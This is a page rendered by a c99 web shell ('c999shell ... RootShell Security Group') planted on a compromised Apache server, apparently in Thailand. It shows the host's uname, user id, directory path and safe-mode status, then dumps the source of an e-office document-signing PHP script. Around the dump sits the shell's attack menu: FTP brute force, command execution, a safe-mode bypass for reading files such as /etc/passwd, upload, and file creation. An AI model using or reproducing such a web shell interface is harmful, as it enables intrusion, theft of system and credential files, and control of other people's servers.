!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mistk/mistk/mistk/eoffice/admin/   drwxr-xr-x
Free 50.78 GB of 127.8 GB (39.73%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processSignDoc.php (9.91 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsRunningDoc.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsDocWSign.php";
include_once 
"../class/clsDocForSign.php";
include_once 
"../class/clsDocLineConfig.php";
include_once 
"../class/clsNoticeEditDoc.php";

include_once 
"../class/clsSignature.php"// Add by Chain 2558/06/17

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDt = new doctype($oC);
$oDt1 = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDatt = new Docattatches($oC);
$oDoc = new Documents($oC);
$oRd = new runningdoc($oC);
$oRd1 = new runningdoc($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oDws = new docwsign($oC);
$oDfs = new DocForSign($oC);
$oDlc = new DocLineConfig($oC);
$oNe = new NoticeEditDoc($oC);

$osign = new signature($oC); // Add by Chain 2558/06/17

if($method=="addsign"){
    if(
$canendDoc!='Y'){ 
        
$flagCommit true;
        
$oC->BeginTrans();
        
        
$oDoc->SearchByKey($DocID);
        if(
$oDoc->GetRecord()=="1"){
                
$oDoc->Edit();
                
$oDoc->DsID="3";
                
$flagCommit $oDoc->Save();
        }
                
$oRs->SearchByKey($DrsID);
                
$oRs->GetRecord();
                
$oRs->Edit();
                
$oRs->DlcID=$DlcIDlogin;
                
$oRs->DrsReceivePersonId=$personId;
                
$oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
                
//echo "DrsSendDate=".$oRs->DrsSendDate;
                
if($cansend!="Y"){
                    
//$oRs->DrsSendPersonId=$DlcPsId;
                    
$oRs->DrsSendPersonId='';
                }else if(
$cansend=="Y"){
                    
$oRs->DrsSendPersonId=$personId;
                }
                
//echo "DrsSendPersonId=".$oRs->DrsSendPersonId;
                
if($cansend!="Y"){
                    
$oRs->DrsSendDlcID=$DlcPs;
                }else if(
$cansend=="Y"){
                    
$oRs->DrsSendDlcID=$DlcIDlogin;
                }
                
//echo "DrsSendDlcID=".$oRs->DrsSendDlcID;
                
$oRs->DrsSign=$DrsSign;    
                
$oRs->Save();

                
$oRs2->SearchPreDocSignforDlpID0_Update2($DlcIDlogin,$personId,$oRs->DrsFromDrsID);
//-------------------------------------------------------------------------------------------------
//---------------add Signature---------------------------------------------------------------------
//--- Add by Chain 2558/06/17 ---------------------------------------------------------------------
//-------------------------------------------------------------------------------------------------
                
$osign->AddNew();
                
//$osign->imgID = $osign->GetNextCode;
                
$osign->DocID $DocID;
                
$osign->DlcID $DlcIDlogin;
                
$osign->DrsID $DrsID;
                
$osign->personId $personId;
                
$osign->imgSource $imgSource;
                
$osign->Save();
//-------------------------------------------------------------------------------------------------
                
                //---------------add DocReceiveSend
                
$oRs1->AddNew();
                
$oRs1->DrsID=$oRs1->GetNextCode();
                
$oRs1->DocID=$DocID;
                if(
$cansend!="Y"){
                    
$oRs1->DlcID=$DlcPs;
                }else if(
$cansend=="Y"){
                    
$oRs1->DlcID=$DlcIDlogin;
                }
                
$oRs1->DsID=3;
                
$oRs1->PtID=$oRs->PtID;
                
$oRs1->DrsDocTypeNo=$oRs->DrsDocTypeNo;
                
$oRs1->DrsReceiveDate=$oRs->DrsSendDate;
                
//$oRs1->DrsReceivePersonId=$DlcPsId;
                
$oRs1->DrsReceivePersonId='';
                
$oRs1->DrsDocDueDate=$oRs->DrsDocDueDate;
                
$oRs1->DrsDlcIDCreate=$DlcIDlogin;
                
$oRs1->DrsPsIDCreate=$personId;
                
$oRs1->DrsPropose=$oRs->DrsPropose;
                
$oRs1->DrsSign=$DrsSign;
                
$oRs1->DrsFromDrsID=$oRs->DrsID;
                
//echo "DrsFromDrsID=".$oRs1->DrsFromDrsID;
                
$oRs1->DocGroup=$oRs->DocGroup;
                if(
$cansend!="Y"){
                    
$oRs1->DrsSend=$oRs1->DrsSend;
                }else if(
$cansend=="Y"){
                    
$oRs1->DrsSend="Y";
                }    
                
$oRs1->AnID=$oRs->AnID;
                
$oRs1->DrsstartDatePost=$oRs->DrsstartDatePost;
                
$oRs1->DrsendDatePost=$oRs->DrsendDatePost;    
                
$flagCommit $oRs1->Save();
        
        if(
$DocForSign==&& $DocPID!="0"){
            
$oDlc->SearchByKey($DlcIDlogin); $oDlc->GetRecord(); 
            
$oRs2->SearchDeptSendDocforSign($oDoc->DocID);
            
$oRs2->GetRecord();
            
$oRs3->SearchByKey($oRs2->DrsFromDrsID);
            
$oRs3->GetRecord();
            
            
$oDfs->AddNew();
            
$oDfs->dfID=$oDfs->GetNextCode();
            
$oDfs->DocID=$oRs3->DocID;
            
$oDfs->DlcID=$oRs2->DrsDlcIDCreate;
            
$oDfs->DocGroup=$oRs3->DocGroup;
            
$oDfs->DlcIDsign=$DlcIDlogin;
            
$oDfs->DeptSign=$oDlc->deptId;
            
$oDfs->Save();
            
//echo $oRs8->DrsID.'--'.$oRs8->DrsDlcIDCreate.'--'.$oRs8->DrsPsIDCreate.'-'.$oRs8->DrsFromDrsID;        
        
}
                
                if(
$flagCommit)
                    
$oC->CommitTrans();
                else
                    
$oC->RollbackTrans();
        if(
$DocForSign==&& $DocPID!="0"){
            echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php?folderstaff2=$folderstaff2&forfolderstaff2=$forfolderstaff2'>";
        }else{            
            if(
$cansend=="Y"){
                if(
$oDoc->RsID!='2'){ $fn="showSendDoc.php"; }else{  $fn="showSendDocSR.php"; }
                echo 
"<meta http-equiv='refresh' content='0; URL=$fn?DocID=$DocID&DrsID=$oRs1->DrsID&cansend=$cansend'>";
            }else{                    
                echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php?page_id2=$page_id2&searchpredocdate=$searchpredocdate&selectpredocdatevalue=$selectpredocdatevalue&folderstaff2=$folderstaff2&forfolderstaff2=$forfolderstaff2&searchNamePre=$searchNamePre&searchNoPre=$searchNoPre&searchDeptPre=$searchDeptPre'>";
            }
        }
    }else if(
$canendDoc=='Y'){ 
        
$flagCommit true;
        
$oC->BeginTrans();

        
$oDoc->SearchByKey($DocID);
        if(
$oDoc->GetRecord()=="1"){
                
$oDoc->Edit();
                
$oDoc->DsID="3";
                
$flagCommit $oDoc->Save();
        }
        
                
$oRs->SearchByKey($DrsID);
                
$oRs->GetRecord();
                
$oRs->Edit();
                
$oRs->DlcID=$DlcIDlogin;
                
$oRs->DrsReceivePersonId=$personId;                
                
$oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
                
//echo "DrsSendDate=".$oRs->DrsSendDate;
                /*
                if($cansend!="Y"){
                    //$oRs->DrsSendPersonId=$DlcPsId;
                    $oRs->DrsSendPersonId='';
                }else if($cansend=="Y"){*/
                    
$oRs->DrsSendPersonId=$personId;
                
//}
                
                //echo "DrsSendPersonId=".$oRs->DrsSendPersonId;
                //if($cansend!="Y"){
                    //$oRs->DrsSendDlcID=$DlcPs;
                //}else if($cansend=="Y"){
                    
$oRs->DrsSendDlcID=$DlcIDlogin;
                
//}
                //echo "DrsSendDlcID=".$oRs->DrsSendDlcID;
                
$oRs->DrsSign=$DrsSign;
                
$oRs->DrsSignEndDoc='Y';    
                
$oRs->Save();

                
$oRs2->SearchPreDocSignforDlpID0_Update2($DlcIDlogin,$personId,$oRs->DrsFromDrsID);
        
        if(
$flagCommit)
            
$oC->CommitTrans();
        else
            
$oC->RollbackTrans();
        
        echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php?page_id2=$page_id2&searchpredocdate=$searchpredocdate&selectpredocdatevalue=$selectpredocdatevalue&folderstaff2=$folderstaff2&forfolderstaff2=$forfolderstaff2&searchNamePre=$searchNamePre&searchNoPre=$searchNoPre&searchDeptPre=$searchDeptPre'>";    
    }
}else if(
$method=="addsignDocforSign"){ 
    
$flagCommit true;
    
$oC->BeginTrans();
    
    
$oDoc->SearchByKey($DocID);
    if(
$oDoc->GetRecord()=="1"){
            
$oDoc->Edit();
            
$oDoc->DsID="3";
            
$flagCommit $oDoc->Save();
    }
            
$oRs->SearchByKey($DrsID);
            
$oRs->GetRecord();
            
$oRs->Edit();
            
$oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
            if(
$cansend!="Y"){
                
$oRs->DrsSendPersonId='';
            }else if(
$cansend=="Y"){
                
$oRs->DrsSendPersonId=$personId;
            }
            if(
$cansend!="Y"){
                
$oRs->DrsSendDlcID=$DlcPs;
            }else if(
$cansend=="Y"){
                
$oRs->DrsSendDlcID=$DlcIDlogin;
            }
            
$oRs->DrsSign=$DrsSign;    
            
$flagCommit $oRs->Save();
            
            if(
$flagCommit)
                
$oC->CommitTrans();
            else
                
$oC->RollbackTrans();
                                    
        echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php?page_id2=$page_id2&searchpredocdate=$searchpredocdate&selectpredocdatevalue=$selectpredocdatevalue&folderstaff2=$folderstaff2&forfolderstaff2=$forfolderstaff2&searchNamePre=$searchNamePre&searchNoPre=$searchNoPre&searchDeptPre=$searchDeptPre'>";
}else if(
$method=="addWsign"){ 
    
$flagCommit true;
    
$oC->BeginTrans();
    
            
$oRs->SearchByKey($DrsID);
            
$oRs->GetRecord();
            
$oRs->Edit();
            
$oRs->DrsWSign='Y'
            
$oRs->DlcID=$DlcIDlogin;
            
$oRs->DrsReceivePersonId=$personId;
            
$oRs->Save();
            
            
$oRs2->SearchPreDocSignforDlpID0_Update2($DlcIDlogin,$personId,$oRs->DrsFromDrsID);
            

            
$oDws->AddNew();
            
$oDws->wID=$oDws->GetNextCode();
            
$oDws->DocID=$oRs->DocID;
            
$oDws->DrsID=$DrsID;
            
$oDws->signDateTime=getNowDateTh()." ".date('H:i:s');
            
$oDws->DlcID=$oRs->DlcID;
            
$oDws->personId=$oRs->DrsReceivePersonId;
            
$oDws->DocGroup=$oRs->DocGroup;
            
$flagCommit $oDws->Save();


    
            if(
$flagCommit)
                
$oC->CommitTrans();
            else
                
$oC->RollbackTrans();
    echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php?page_id2=$page_id2&searchpredocdate=$searchpredocdate&selectpredocdatevalue=$selectpredocdatevalue&folderstaff2=$folderstaff2&forfolderstaff2=$forfolderstaff2&searchNamePre=$searchNamePre&searchNoPre=$searchNoPre&searchDeptPre=$searchDeptPre'>";    
}else if(
$method=="editDocSign"){
    
$oNe->AddNew();
    
$oNe->neID=$oNe->GetNextCode();
    
$oNe->DocID=$DocID;
    
$oNe->DrsID=$DrsID;
    
$oNe->DlcIDCreate=$DlcIDlogin;
    
$oNe->PsCreate=$personId;
    
$oNe->DlcIDReceive=$DlcIDReceive;
    
$oNe->PsReceive=$DlcPsId;
    
$oNe->DocComment=$noticecomment;
    
$oNe->DocCommentDate=getNowDateTh()." ".date('H:i:s');
    
$oNe->statusDoc="1";
    
$flagCommit $oNe->Save();
    
            if(
$flagCommit)
                
$oC->CommitTrans();
            else
                
$oC->RollbackTrans();
    echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php?page_id2=$page_id2&searchpredocdate=$searchpredocdate&selectpredocdatevalue=$selectpredocdatevalue&folderstaff2=$folderstaff2&forfolderstaff2=$forfolderstaff2&searchNamePre=$searchNamePre&searchNoPre=$searchNoPre&searchDeptPre=$searchDeptPre'>";        
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0148 ]--